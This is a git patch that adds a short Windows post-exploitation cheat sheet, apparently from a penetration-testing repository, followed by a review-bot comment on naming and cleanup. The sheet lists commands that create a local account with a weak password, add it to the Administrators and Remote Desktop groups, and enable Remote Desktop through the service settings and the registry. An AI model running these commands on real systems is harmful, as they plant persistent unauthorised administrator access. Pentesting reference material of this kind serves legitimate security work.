From db831da1fae5f1c31aa61ca6e9b80ec9a6badb7e Mon Sep 17 00:00:00 2001 From: Omar Santos Date: Sun, 18 Jul 2021 23:33:45 -0400 Subject: [PATCH] Create misc-windows-post-exploitation.md --- .../misc-windows-post-exploitation.md | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 post_exploitation/misc-windows-post-exploitation.md diff --git a/post_exploitation/misc-windows-post-exploitation.md b/post_exploitation/misc-windows-post-exploitation.md new file mode 100644 index 0000000..f813fc4 --- /dev/null +++ b/post_exploitation/misc-windows-post-exploitation.md @@ -0,0 +1,37 @@ +# Misc Windows Post Exploitation Tasks + +### Adding a Windows User (joker): +``` +net user /add joker password123 +``` + +### Adding a user to the Administrators groups +``` +net localgroup administrators /add joker +``` + +### Adding a user to the Remote Desktop user group +``` +net localgroup "Remote Desktop users" hacker /add +``` + +### Starting the Remote Desktop service +``` +net start TermService +``` + +### Verifying if the Remote Desktop Service is active and running +``` +tasklist /svc | findstr /C:TermService +``` + +### Permanently enable Terminal Services +``` +sc config TermService start=auto +``` + +### Enabling Terminal services via the registry +Note: You need to reboot after invoking this... +``` +reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f +```
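Review bot: The account name is inconsistent across the new file. The "Adding a user to the Remote Desktop user group" block runs `net localgroup "Remote Desktop users" hacker /add`, while the two sections before it create and elevate `joker`, so a reader following the steps in order never adds the created account to that group. Use `joker` there, and keep the argument order consistent with the `net localgroup administrators /add joker` line above it. Smaller points in the same hunk: the heading "Adding a user to the Administrators groups" should read "group"; only the first heading ends with a colon; and the headings jump from `#` straight to `###`. The file also has no section for reverting what it changes (the `joker` account, the `TermService` start type and the `fDenyTSConnections` value), which would be worth adding so the steps can be undone and accounted for at the end of an engagement.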